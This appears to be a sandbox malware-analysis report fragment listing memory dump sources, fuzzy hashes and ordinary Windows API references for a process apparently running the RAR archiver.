• Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
Similarity
• API ID: CriticalSection$EnterEventLeave
• String ID:
• API String ID: 3094578987-0
• Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
• Instruction ID: acb3e521abd7c8735cc918fa963e6b8afcfb6e06388073fafe8e86834fb3f545
• Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
• Instruction Fuzzy Hash: F6F06222A18A4A83DE20EF26F9400BE6360FFCAB9AF040134DE9D4666DDE2CD555DB01
Memory Dump Source
• Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
• Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
Similarity
• API ID: ConsoleFileHandleModeType
• String ID:
• API String ID: 4141822043-0
• Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
• Instruction ID: c554aef4d6f53da9bf3e79680d90acccd62cfaa65cc0855b7cbe565290a6e2d8
• Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
• Instruction Fuzzy Hash: E2E08C20E0460B42EF584F23ACA513E12519F9EB83F405038D80FCA750EE2CA485D301
Memory Dump Source
• Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
• Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
• Instruction ID: d9d58aeb4384265c851dfd9aca2d7b253a8e654679a165595086a383c48f7675
• Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
• Instruction Fuzzy Hash: F7E09A24E0974E82FE546F769C8537E23626FCA743F00543CCD0E96396DE3DB8499252
Memory Dump Source
• Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
• Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
Similarity
• API ID: CharEnvironmentExpandStrings
• String ID:
• API String ID: 4052775200-0
• Opcode ID: a3ba1b03603a475655284a6a52820d5ab219f11978c107c81e75b3572b44f527
• Instruction ID: dd2f9990e50d9a0789e18c2def79be734b9f73a6cef692154ac016ada63c322a
• Opcode Fuzzy Hash: a3ba1b03603a475655284a6a52820d5ab219f11978c107c81e75b3572b44f527
• Instruction Fuzzy Hash: 12E1D322A1868681EF208F65E8002BF67A2FBD3795F444131DB9D876D9DF7CE481E702
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF629B07EBE,00000000,00000000,00000000,00000000,00000007,00007FF629B07C48), ref: 00007FF629B11B8D
                                                              • CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF629B07EBE,00000000,00000000,00000000,00000000,00000007,00007FF629B07C48), ref: 00007FF629B11BD7
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                              • Instruction ID: 0e89461598d1930c6e431097ef67a9ef35bdbe2c05ac4724004e7154e06988c0
                                                              • Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                              • Instruction Fuzzy Hash: AB312663A186494AFB709F21D8053AF36A0EB83B7AF104334DA6C866C5DF7CD585E742
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a42658d34a1fb92fbd8d718425b99dc084056a970e35fbbcb39c16e60e17b306
                                                              • Instruction ID: aa5030dd8015168b47f5e5625cbc594187fbaea1b96f89278838654bde50ce8e
                                                              • Opcode Fuzzy Hash: a42658d34a1fb92fbd8d718425b99dc084056a970e35fbbcb39c16e60e17b306
                                                              • Instruction Fuzzy Hash: 5A118431A09B8581EE00DF64E9543AE7294EFC6795F140638D69D477E6DE38D051E311
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                              • Instruction ID: 10b2816af76f00eb4ef6ee9be2aa05c035be191cdf87bf776d32560801dc6762
                                                              • Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                              • Instruction Fuzzy Hash: BF01E525E1969A42EE688F26E80146E6261EFD7BF1F145730DA2D83BD4CE3CE451EB01
                                                              APIs
                                                              • setbuf.LIBCMT ref: 00007FF629B07A7B
                                                                • Part of subcall function 00007FF629B52AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF629B57EF3
                                                              • setbuf.LIBCMT ref: 00007FF629B07A8F
                                                                • Part of subcall function 00007FF629B07B44: GetStdHandle.KERNEL32(?,?,?,00007FF629B07A9E), ref: 00007FF629B07B4A
                                                                • Part of subcall function 00007FF629B07B44: GetFileType.KERNELBASE(?,?,?,00007FF629B07A9E), ref: 00007FF629B07B56
                                                                • Part of subcall function 00007FF629B07B44: GetConsoleMode.KERNEL32(?,?,?,00007FF629B07A9E), ref: 00007FF629B07B69
                                                                • Part of subcall function 00007FF629B52ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF629B52AD0
                                                                • Part of subcall function 00007FF629B52B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF629B52C1C
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
                                                              • String ID:
                                                              • API String ID: 4044681568-0
                                                              • Opcode ID: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
                                                              • Instruction ID: 7f38928273bb8bcd8ecdce9b9cb3d725e47330c8b88bec31726aebc0ec01037f
                                                              • Opcode Fuzzy Hash: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
                                                              • Instruction Fuzzy Hash: 23019E01E1A18A16FE18BFB59CA23BF65828FD3313F544278E52E8A7D3DD1C6445A353
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                              • Instruction ID: 56ad3079ba996761698f63fddb95932b12cf9d6b4ec809f2ba4a944ca1cb0e1d
                                                              • Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                              • Instruction Fuzzy Hash: D301A521E1864A82EF649F2AE84037E2350EF8677AF144335D23D811E5CF3CD586DB11
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(00000800,00007FF629B1305D,?,?,?,?,?,?,?,?,00007FF629B24126,?,?,?,?,00000800), ref: 00007FF629B130F0
                                                              • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF629B24126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF629B13119
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                              • Instruction ID: 84474f52536cc42518d6cad3dd5630de88767fbbca76579511b2e8d8111d4da2
                                                              • Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                              • Instruction Fuzzy Hash: 83F0AF22B1868542EE609F25FC943AE6290BB8F7D5F400131EA9CC7799DE7CE584AA01
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: DirectoryLibraryLoadSystem
                                                              • String ID:
                                                              • API String ID: 1175261203-0
                                                              • Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                              • Instruction ID: a9529ca89a1daa51ecd42d5fbd48a0d8c8d3365d48e91f224c1f0751313f64f5
                                                              • Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                              • Instruction Fuzzy Hash: 2FF06222B2858542FE70AF21EC153FF6264BFCA785F804035E9CDC6699DE2CE244EA01
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: Process$AffinityCurrentMask
                                                              • String ID:
                                                              • API String ID: 1231390398-0
                                                              • Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                              • Instruction ID: 1b4f9cf8d7721f8d9df3dd06abb612c5eed68c6144d02da4447fc2d2c39ded53
                                                              • Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                              • Instruction Fuzzy Hash: 3FE0E520B3845A43DFD89B2A8891FAE2390AB86B81F802039F40AC3A14DD1CD4448B01
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                              • String ID:
                                                              • API String ID: 588628887-0
                                                              • Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                              • Instruction ID: 7e8494c5e86f6884e237417d61a5b2505954526daa3b295d21be9409182c5636
                                                              • Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                              • Instruction Fuzzy Hash: 15E04F61E1910F42FE58AFB39C4417E12925FCA746F048434D90DD6251EE2CA441A206
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cf3431c2f8b5c05d861a21d8e67f661f4fc02fcce2a835ad0cc1140c53210456
                                                              • Instruction ID: 6daeaa2b04beca659c76460042dddc9b6066fe0ccf24d67566f2f1a6928ee157
                                                              • Opcode Fuzzy Hash: cf3431c2f8b5c05d861a21d8e67f661f4fc02fcce2a835ad0cc1140c53210456
                                                              • Instruction Fuzzy Hash: 6CE1D921A0868A42FF20DE359C946FF2751EFC3B8AF044135DD4D8BAD6DE2CA445E716
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
